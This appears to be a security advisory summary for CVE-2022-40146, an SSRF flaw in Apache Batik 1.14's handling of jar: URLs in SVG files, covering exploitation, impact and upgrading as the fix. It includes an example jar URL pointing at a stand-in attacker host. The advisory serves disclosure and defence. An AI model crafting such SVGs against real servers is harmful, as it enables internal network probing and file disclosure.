Jar url should be blocked by DefaultScriptSecurity

Vulnerability

Overview

CVE-2022-40146 is a Server-Side Request Forgery (SSRF) vulnerability in Apache XML Graphics Batik version 1.14. The issue stems from Batik's handling of jar URLs within SVG files. Specifically, the DefaultScriptSecurity mechanism fails to properly block jar: protocol URLs, allowing an attacker to craft an SVG that references a malicious jar archive via a networked URL (e.g., jar:http://attacker.com/poc.jar!/) [1][3]. This omission means SVG content can trigger outbound requests to arbitrary hosts or local file system access.

Exploitation

Exploitation requires the attacker to supply a crafted SVG file to an application that uses Batik for SVG processing, such as transcoding or rendering. The attack is triggered when Batik processes an SVG containing a ` element with an xlink:href` pointing to a jar URL [3]. No authentication is needed if the application accepts user-supplied SVGs. The SSRF occurs when Batik attempts to fetch the jar archive, making requests to attacker-controlled or internal network addresses.

Impact

A successful attack can lead to reading arbitrary files on the server (via file:// scheme) or probing internal infrastructure that is not otherwise accessible. Although the primary vector is SSRF, this can escalate to information disclosure, internal network scanning, or potentially triggering other vulnerabilities in internal services.

Mitigation

Apache released a fix in Batik 1.15 (or later). Users should upgrade to Batik 1.17, which addresses multiple CVEs, including this one [4]. No workaround is available for version 1.14; upgrading is the only mitigatin [4].